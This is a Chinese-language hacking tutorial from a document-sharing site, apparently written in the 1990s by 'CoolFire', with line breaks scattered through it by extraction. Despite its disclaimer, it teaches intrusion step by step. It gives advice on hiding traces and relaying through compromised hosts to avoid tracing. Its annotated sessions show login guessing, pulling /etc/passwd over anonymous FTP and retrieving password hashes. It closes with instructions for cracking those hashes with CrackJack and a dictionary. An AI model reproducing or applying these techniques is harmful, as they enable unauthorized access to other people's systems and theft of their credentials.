如何破解系统1.docx
《如何破解系统1.docx》由会员分享,可在线阅读,更多相关《如何破解系统1.docx(14页珍藏版)》请在冰豆网上搜索。
如何破解系统1
如何破解系统
(1)
这不是一个教学文件,只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护,如果你能够将这份文件完全看完,你就能够知道电脑骇客们是如何入侵你的电脑,我是CoolFire,写这篇文章的目的是要让大家明白电脑安全的重要性,并不是教人CrackPassword若有人因此文件导致恶意入侵别人的电脑或网路,本人概不负责!
!
#1甚麽是Hacking?
就是入侵电脑!
有甚麽好解释的!
大部份有关介绍Hacker的书籍或小说及文件等都有清楚的介绍,沉迷於电脑的人...破坏...唉!
一大堆怪解释就是了,最好不要成为一个"骇客",我...不是!
#2为甚麽要Hack?
我们只是为了要了解更多关於系统的技术,入侵它,了解它是如何运作的,试试它的安全性,然後学著去使用它,读取系统中有关操作的说明,学习它的各项操作!
!
为了安全性而作革命!
#3Hack守则
1.不恶意破坏任何的系统,这样作只会给你带来麻烦.
恶意破坏它人的软体将导致法律刑责,如果你只是使用电脑,那仅为非法使用!
!
注意:
千万不要破坏别人的软体或资料!
!
2.不修改任何的系统档,如果你是为了要进入系统而修改它,请在答到目的後将它改回原状.
3.不要轻易的将你要Hack的站台告诉你不信任的朋友.
4.不要在bbs上谈论你Hack的任何事情.
5.在Post文章的时候不要使用真名.
6.正在入侵的时候,不要随意离开你的电脑.
7.不要侵入或破坏政府机关的主机.
8.不在电话中谈论你Hack的任何事情.
9.将你的笔记放在安全的地方.
10.想要成为Hacker就要真正的Hacking,读遍所有有关系统安全或系统漏洞的文件(英文快点学好)!
11.已侵入电脑中的帐号不得清除或修改.
12.不得修改系统档案,如果为了隐藏自己的侵入而作的修改则不在此限,但仍须维持原来系统的安全性,不得因得到系统的控制权而将门户大开!
!
13.不将你已破解的帐号分享与你的朋友.
#4破解之道
1.进入主机中
2.得到/etc/passwd
3.得到系统帐号
4.得到最高权限
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How1.
进入主机有好几种方式,可以经由Telnet(Port23)或SendMail(Port25)或FTP或WWW(Port80)的方式进入,一台主机虽然只有一个位址,但是它可能同时进行多项服务,所以如果你只是要"进入"该主机,这些Port都是很好的进行方向.当然还有很多Port,但是DayTime的Port你能拿它作甚麽?
?
?
我不知道,你知道吗?
!
底下的示范并不是像写出来的那麽容易,只不过是要让你了解如何进入,当然其中还有很多问题,如打错指令......等等的毛病...没有出现在课堂上,但是我为了面子....一定要删掉这些不堪入目的东西嘛...
示范进入主机的方法:
(ByCoolFire)
(首先要先连上某一台你已经有帐号的Telnet主机,当然最好是假的,也就是Crack过的主机,然後利用它来Crack别的主机,才不会被别人以逆流法查出你的所在)
DigitalUNIX()(ttypa)
login:
FakeName
Password:
Lastlogin:
MonDec203:
24:
00from255.255.0.0
(我用的是...当然是假的罗,都已经经过修改了啦!
!
没有这一台主机啦!
!
别怕!
别怕!
以下的主机名称都是假的名称,请同学们要记得!
!
)
DigitalUNIXV1.2C(Rev.248);MonOct3121:
23:
02CST1996
DigitalUNIXV1.2CWorksystemSoftware(Rev.248)
DigitalUNIXChineseSupportV1.2C(rev.3)
(嗯...进来了!
开始攻击吧!
本次的目标是......)
>telnet(Telnet试试看....)
Trying111.222.255.255...
Connectedto.
Escapecharacteris'^]'.
Password:
Loginincorrect
(没关系,再来!
!
)
coollogin:
hinet
Password:
Loginincorrect
coollogin:
(都没猜对,这边用的是猜的方法,今天运气好像不好)
telnet>close
Connectionclosed.
(重来,换个Port试试看!
!
)
>telnet111.222.255.25580
Trying111.222.255.255...
Connectedto111.222.255.255.
Escapecharacteris'^]'.
ErrorError400
Invalidrequest""(unknownmethod)
//www.w3.org">CERN-HTTPD3.0A
Connectionclosedbyforeignhost.
(哇哩!
!
连密码都没得输入,真是.....再来!
!
要有恒心!
!
)
(换FTPPort试试)
>ftp111.222.255.255
Connectedto111.222.255.255.
220coolFTPserver(Versionwu-2.4
(1)TueAug815:
50:
43CDT1995)ready.
Name(111.222.255.255:
FakeName):
anonymous
331Guestloginok,sendyourcompletee-mailaddressaspassword.
Password:
230-Welcome,archiveuser!
ThisisanexperimentalFTPserver.Ifhaveany
230-unusualproblems,pleasereportthemviae-mailtoroot@
230-Ifyoudohaveproblems,pleasetryusingadash(-)asthefirstcharacter
230-ofyourpassword--thiswillturnoffthecontinuationmessagesthatmay
230-beconfusingyourftpclient.
230-
230Guestloginok,accessrestrictionsapply.
RemotesystemtypeisUNIX.
Usingbinarymodetotransferfiles.
(哇!
可以用anonymous进来耶!
!
password部份输入aaa@就好了!
不要留下足迹喔!
!
)
ftp>ls
200PORTcommandsuccessful.
150OpeningASCIImodedataconnectionforfilelist.
etc
pub
usr
bin
lib
incoming
welcome.msg
226Transfercomplete.
(嗯嗯...太好了!
进来了!
!
下一个目标是.....)
ftp>cdetc
250CWDcommandsuccessful.
ftp>getpasswd(抓回来!
!
)
200PORTcommandsuccessful.
150OpeningBINARYmodedataconnectionforpasswd(566bytes).
226Transfercomplete.
566bytesreceivedin0.56seconds(0.93Kbytes/s)
(喔...这麽容易吗?
?
)
ftp>!
catpasswd(看看!
!
!
)
root:
:
0:
0:
root:
/root:
/bin/bash
bin:
*:
1:
1:
bin:
/bin:
daemon:
*:
2:
2:
daemon:
/sbin:
adm:
*:
3:
4:
adm:
/var/adm:
lp:
*:
4:
7:
lp:
/var/spool/lpd:
sync:
*:
5:
0:
sync:
/sbin:
/bin/sync
shutdown:
*:
6:
0:
shutdown:
/sbin:
/sbin/shutdown
halt:
*:
7:
0:
halt:
/sbin:
/sbin/halt
mail:
*:
8:
12:
mail:
/var/spool/mail:
news:
*:
9:
13:
news:
/var/spool/news:
uucp:
*:
10:
14:
uucp:
/var/spool/uucp:
operator:
*:
11:
0:
operator:
/root:
/bin/bash
games:
*:
12:
100:
games:
/usr/games:
man:
*:
13:
15:
man:
/usr/man:
postmaster:
*:
14:
12:
postmaster:
/var/spool/mail:
/bin/bash
ftp:
*:
404:
1:
:
/home/ftp:
/bin/bash
(哇哩...是Shadow的...真是出师不利....)
ftp>bye
221Goodbye.
(不信邪....还是老话,要有恒心....)
(FTP不行,再Telnet看看!
!
)
>telnet
Trying111.222.255.255...
Connectedto.
Escapecharacteris'^]'.
Password:
Loginincorrect
(又猜错!
!
)
coollogin:
fuckyou
Password:
Lastlogin:
MonDec209:
20:
07from205.11.122.12
Linux1.2.13.
Someprogramminglanguagesmanagetoabsorbchangebutwithstand
progress.
cool:
~$
(哇哈哈!
!
哪个笨root,用systemname作username连
password也是systemname....总算...没白玩...)
cool:
~$system
bash:
system:
commandnotfound
(嗯...这个user的权限好像不大....)
cool:
~$ls
cool:
~$pwd
/home/fuckyou
cool:
~$cd/
cool:
/$ls
Public/cdrom/lib/mnt/tmp/www/
READMEdev/linux*proc/usr/
bin/etc/local/root/var/
boot/home/lost+found/sbin/
cool:
/$cdetc
telnet>quit
(好想睡呀!
!
不玩了!
!
下节课再开始....)
Connectionclosed.
>exit
(走了!
!
下节课在见啦!
!
今天就上到这里!
老师要先下班了!
!
)
(有学生说:
骗人!
还没有破解呀!
!
胡说!
不是已经进来了吗?
?
?
看看这节课上的是甚麽?
?
?
---->进入主机!
!
嗯.....)
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How2.
上节课抓回来一个"乱七八糟"的/etc/passwd,你以为我的真那麽笨吗?
?
guest所抓回来的能是甚麽好东西?
?
所以这一节课继续上次的攻击行动.上节课我们已经"猜"到了一个不是guest的username及password.今天就以它来进入主机瞧瞧!
!
DigitalUNIX()(ttypa)
login:
FakeName
Password:
Lastlogin:
MonDec203:
24:
00from255.255.0.0
DigitalUNIXV1.2C(Rev.248);MonOct3121:
23:
02CST1996
DigitalUNIXV1.2CWorksystemSoftware(Rev.248)
DigitalUNIXChineseSupportV1.2C(rev.3)
(嗯...进来了!
开始攻击吧!
本次的目标是.....呵...)
>telnet(Telnet试试看....昨天的位址,
有作笔记吧!
)
.tw>telnet
Trying111.222.255.255...
Connectedto.
Escapecharacteris'^]'.
Password:
Loginincorrect
coollogin:
fuckyou
Password:
(一样输入fuckyou)
Lastlogin:
MonDec112:
44:
10from
Linux1.2.13.
cool:
~$cd/etc
cool:
/etc$ls
DIR_COLORSftpuserslocaltimeresolv.conf
HOSTNAMEgatewaysmagicrpc
NETWORKINGgroupmail.rcsecuretty
NNTP_INEWS_DOMAINhost.confmotdsendmail.cf
X11@hostsmessages/sendmail.st
XF86Confighosts.allowmtabservices
at.denyhosts.denymtoolsshells
bootptabhosts.equivnamed.bootshutdownp
csh.cshrchosts.lpdnetworkssnoopy/
csh.loginhttpd.confnntpserverslip.hosts
exportsinetd.confpasswdsnooptab
fastbootinittabpasswd.OLDsyslog.conf
fdprmissuepasswd.oldsyslog.pid
fstabld.so.cacheprintcapttys
ftpaccessld.so.confprofileutmp@
(找寻目标.....太乱了!
懒得找,再来....)
cool:
/etc$lspa*
passwdpasswd.OLDpasswd.old
(果然在)
cool:
/etc$morepasswd
(看看有没有Shadow...)
root:
acqQkJ2LoYp:
0:
0:
root:
/root:
/bin/bash
john:
234ab56:
9999:
13:
JohnSmith:
/home/john:
/bin/john
(正点!
一点都没有防备!
!
)
cool:
/etc$exit
logout
(走了!
....换FTP上场!
!
)
Connectionclosedbyforeignhost.
>ftp
Connectedto.
220coolFTPserver(Versionwu-2.4
(1)TueAug815:
50:
43CDT1995)ready.
Name(:
66126):
fuckyou
331Passwordrequiredforfuckyou.
Password:
230Userfuckyouloggedin.
RemotesystemtypeisUNIX.
Usingbinarymodetotransferfiles.
ftp>cd/etc
250CWDcommandsuccessful.
ftp>getpasswd
200PORTcommandsuccessful.
150OpeningBINARYmodedataconnectionforpasswd(350bytes).
226Transfercomplete.
350bytesreceivedin0.68seconds(1.9Kbytes/s)
ftp>!
catpasswd
root:
acqQkJ2LoYp:
0:
0:
root:
/root:
/bin/bash
john:
234ab56:
9999:
13:
JohnSmith:
/home/john:
/bin/john
(看看!
呵!
假不了!
!
......)
ftp>bye
221Goodbye.
>exit
(闪人罗!
!
下课!
!
....喔慢点,还有事要说明......)
passwd的Shadow就是把passwd放在shadow档中,而你原先在第一节课所看到的这个格式的passwd并不是真正的passwd....
root:
:
0:
0:
root:
/root:
/bin/bash
因为密码的部份没有东西....所以拿了也没有用!
!
但这一节课所拿到的东西呢,像是这样,有几点需要说明的,就是它究竟代表著甚麽?
?
?
john:
234ab56:
9999:
13:
JohnSmith:
/home/john:
/bin/sh
它以":
"分成几个栏位,各栏位对照如下:
UserName:
john
Password:
234ab56
UserNo:
9999
GroupNo:
13
RealName:
JohnSmith
HomeDir:
/home/john
Shell:
/bin/sh
了了吧!
了了吧!
保留著你千辛万苦所拿到的passwd,咱们第三节课再来告诉各位如何使用CrackJack把passwd解码....呵呵...
zzZZzZzz...
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
CrackJackV1.4中文使用说明(ByCoolFire12-1-1996)
嗯...该到第三课了!
!
累了的同学先去喝口水吧!
这一节课咱们来说说CrackJack!
这可是个解读/etc/passwd的好工具喔,不要告诉我你习惯用Brute,拿Brute跟CrackJack的速度比比看,包准你马上投向CrackJack1.4的怀抱,但请先确定你所使用的是CrackJack1.4,你可以在CoolFire的Hacker&MailerPage
中拿到这个版本的CrackJack!
这才是真正有用的版本,速度...对...就是这点别人都比不上!
但还是要讲讲它的缺点...就是只能在DOS跟OS2中跑,如果在Windoz95上开个DOSMode跑,它可是连理都不会理你的!
OK!
现在切入正题!
etc/passwd拿到手了吧!
!
开始罗!
!
使用CrackJack1.4前所需要的东西有这些[1]CrackJack1.4(废话...$%^&@@)[2]/etc/passwd档案,你可以在Unix
系统中的/etc/目录中找到passwd[3]字典档(哪里找,自己敲...呵ClayMore中有一份
DIC.TXT是有一千多个字的字典,但比起我的字典可就小巫见大巫了,LetMeIn!
1.0里面也有,听James说2.0Release的时候会有更棒的字典档含入,期待吧!
)....使用CrackJack1.4
前需先确定你所使用的机器是386含以上CPU的!
然後最好有充足的记忆体!
!
开始Jack时只要敲入JACK即可,它会问你PWName...输入你的passwd档名,Dictionary
Name输入你的字典档名,Jack就会开始找了!
找到时会告诉你,也会在JACK.POT中写入它所找到的密码!
!
但...有点怪的格式!
如果找到的是具root权限的密码,Jack会告诉你
ThisisJackAss...嗯...说脏话了!
!
因为使用Jack占用的时间实在太多,如果你中途想要停掉时只要按下Ctrl-C即可,别以为你前功尽弃了!
因为Jack有个Restore的功能,中断时会自动存档为RESTORE,下次要继续这次的寻找只要输入Jack-Restore:
RESTORE即可!
!
当然你也可以为你的Restore重新命名!
Jack也会找得到的...如Renrestorerestore.HNT
之後要再寻找的时後就Jack-Restore:
RESTORE.HNT即可...Jack会很自动的Restore
前次所寻找的字串...继续帮你找下去....
字典档哪里找: